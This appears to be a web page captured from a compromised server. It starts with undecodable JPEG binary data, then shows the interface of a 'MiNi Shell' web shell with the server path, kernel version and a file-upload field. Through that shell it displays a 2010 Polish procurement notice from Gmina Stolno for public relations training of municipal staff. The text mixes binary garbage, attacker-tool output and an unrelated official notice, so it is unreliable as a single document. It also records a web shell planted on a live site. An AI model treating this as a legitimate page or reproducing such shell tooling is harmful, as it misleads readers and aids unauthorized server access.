JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101116/325059-N-2010.html

<p class="kh_header"><b>Stolno: Szkolenie Public Relations realizowane przez Gminę Stolno w ramach projektu pn. Nowa jakość usług w pięciu jednostkach samorządu terytorialnego. Zadanie 3: Wyższe kompetencje - lepsza jakość pracy</b><br>
<b>Numer ogłoszenia: 325059 - 2010; data zamieszczenia: 16.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Stolno , 86-212 Stolno, woj. kujawsko-pomorskie, tel. 056 6770900.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stolno.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie Public Relations realizowane przez Gminę Stolno w ramach projektu pn. Nowa jakość usług w pięciu jednostkach samorządu terytorialnego. Zadanie 3: Wyższe kompetencje - lepsza jakość pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Program szkolenia powinien być opracowany zgodnie z obowiązującymi w tym zakresie przepisami  prawa, szkolenie ma być skierowane do pracowników administracji publicznej (JST) , zajęcia podczas szkolenia  mają być prowadzone metodą warsztatową z wykorzystaniem ćwiczeń oraz testów, program szkolenia powinien obejmować m.in.: 1. Czym zajmuje się public relations? a. Public relations jako tworzenie reputacji, b. Estetyka Public Relations, c. Public relations jako dialog z otoczeniem, 2. Rola badań marketingowych w kształtowaniu PR instytucji. a. Funkcje badan marketingowych, b. Rodzaje badan marketingowych, c. Metody badania opinii. 3. dentyfikacja wizualna instytucji, a. Determinanty wizerunku, b. Opracowanie materiałów promocyjnych - ulotki, informatory, c. Dress code pracowników administracji publicznej. 4. Planowanie strategii PR. a. Wybór celów działań PR
b. Analiza potrzeb i możliwości partnerów zewnętrznych oraz wewnętrznych, c. Przygotowanie budżetu, d. Opracowanie programu i harmonogramu działań. 5. Komunikacja wewnętrzna jako narzędzie PR. a. Proces komunikacji interpersonalnej
b. Bariery w procesie komunikacji w instytucji, c. Narzędzia komunikacji wewnętrznej
6. Efektywna komunikacja z partnerami zewnętrznymi. a. Identyfikacja najważniejszych partnerów instytucji, ich potrzeb i potencjału, b. Techniki komunikowania się z partnerami zewnętrznymi, c. Lobbying. 7. Organizacja imprez PR
a. Drzwi otwarte, b. Konferencje, c. udział w imprezach targowych
8. Kontakty z mediami, a. Przygotowanie komunikatów informacyjnych do mediów
b. Kontakty z dziennikarzami, c. Przygotowanie do wywiadów
d. Organizacja konferencji prasowej, Szczegółowy program szkolenia Wykonawca przedkłada Zamawiającemu wraz z ofertą. Szkolenie zostanie zrealizowane w terminie od dnia zawarcia umowy Zamawiającego z Wykonawcą maksymalnie do 20 grudnia 2010 r. Zamawiający zastrzega sobie prawo wskazania dokładnych terminów realizacji szkolenia. Dzienny wymiar zajęć powinien wynosić 8 godzin zegarowych, z uwzględnieniem przerw (1 godzina szkoleniowa - 45 minut). W szkoleniu będzie brało udział 12 osób (1 grupa szkoleniowa), na jedną osobę będzie przypadało 8 godzin zajęć dziennie przez okres 3 dni. Miejsce realizacji szkolenia: siedziba Urzędu Gminy Stolno. Uczestnikami szkolenia są pracownicy jednostek samorządu terytorialnego zatrudnieni w Urzędach Gmin: Stolno, Lisewo, Chełmno, Grudziądz oraz w Starostwie Powiatowym w Chełmnie. Zamawiający zapewnia sale szkoleniowe oraz pomoce dydaktyczne w postaci projektora lub rzutnika obrazu, tablicy. Wykonawca zapewnia pozostały sprzęt niezbędny do przeprowadzenia szkolenia (np. komputer przenośny); Wykonawca zapewnia: przerwy kawowe (dwie przerwy kawowe, podczas których serwowane minimum to: kawa i herbata bez ograniczeń; zimne napoje minimum 0,5 litr na jednego uczestnika (dwa rodzaje: sok, woda), ciasto (minimum dwa rodzaje; po 1 porcji na 1 uczestnika w trakcie 1 przerwy) oraz poczęstunek w postaci ciepłego dania obiadowego (przykładowy zestaw: ziemniaki/frytki, mięso, surówki). Wykonawca zapewnia: materiały szkoleniowe, które zostaną przekazane uczestnikom na własność (plus jeden komplet do akt zamawiającego) oraz certyfikaty o ukończeniu szkolenia;   Dokumentacja szkoleniowa, materiały szkoleniowe oraz sala szkoleniowa powinny być oznakowane zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013. Szkolenie realizują trenerzy, którzy posiadają odpowiednie kwalifikacje zawodowe oraz doświadczenie. Wykaz zawierający kwalifikacje zawodowe oraz doświadczenie trenera, Wykonawca sporządzi i dostarczy Zamawiającemu zgodnie z załącznikiem nr 4. Wykonawca będzie prowadził dokumentację szkolenia (na drukach dostarczonych przez Zamawiającego), tj.: dzienniki zajęć edukacyjnych zawierające listę obecności, wymiar godzin i tematy zajęć edukacyjnych; - imienne listy potwierdzające skorzystanie z poczęstunku; - imienne listy odbioru materiałów szkoleniowych; - imienne wykazy osób, które ukończyły szkolenie, nie ukończyły szkolenia wraz z imienną listą potwierdzającą odbiór certyfikatów; - sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie DVD). - inne dokumenty niezbędne do prowadzenia szkolenia; Wykonawca przekaże Zamawiającemu oryginały lub uwierzytelnione kopie w/w dokumentów szkolenia. Wykonawca opracuje i przeprowadzi badanie poziomu nabywania wiedzy wśród uczestników szkolenia na z raportem przekaże Zamawiającemu; Wykonawca zamieści ofertę szkolenia w bazie ofert szkoleniowych na stronie internetowej: www.inwestycjawkadry.info.pl. Wykonawca zabezpieczy uczestników kursu od następstw nieszczęśliwych wypadków w związku z kursem, a kopie polisy potwierdzoną za zgodność z oryginałem przekaże Zamawiającemu. Wykonawca sporządzi i przekaże Zamawiającemu na co najmniej 3 dni przed rozpoczęciem szkolenia: harmonogram szkolenia obejmujący jego nazwę i zakres, czas trwania, plan nauczania określający tematy zajęć oraz ich wymiar ze wskazaniem trenera prowadzącego szkolenie oraz dokładnego miejsca przeprowadzenia szkolenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wnioskodawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - załącznik nr 2 do SIWZ. Ocena spełniania warunku udziału w postępowaniu przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanego w przeciągu ostatnich 3 lat co najmniej 1 kursu/szkolenia z zakresu Public Relations, a jeżeli okres przeprowadzenia działalności jest krótszy - w tym okresie - załącznik nr 3 do SIWZ (każde szkolenie winno być wymienione osobno) oraz dokumentów potwierdzających, że usługi wykonane zostały należycie. Ocena spełniania warunku udziału w postępowaniu przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób (trenerów), które będą uczestniczyły w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych i wykształcenia - załącznik 4 do SIWZ; - oświadczenie , że osoby (trenerzy), które będą uczestniczyć w wykonywaniu zamówienia w przeciągu ostatnich 2 lat prowadziły, co najmniej 1 kurs/szkolenie z zakresu Public Relations - załącznik nr 5 do SIWZ. Ocena spełniania warunku udziału w postępowaniu przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wg projektu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stolno.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego: Urząd Gminy Stolno Stolno 112 86-212 Stolno pokój 5a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2010 godzina 09:00, miejsce: Siedziba zamawiającego, tj. Urząd Gminy Stolno Stolno 112 86-212 Stolno pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V. Dobre rządzenie; Działanie 5.2. Wzmocnienie potencjału administracji samorządowej; Poddziadzienie 5.2.1. Modernizacja zarządzania administracji samorządowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com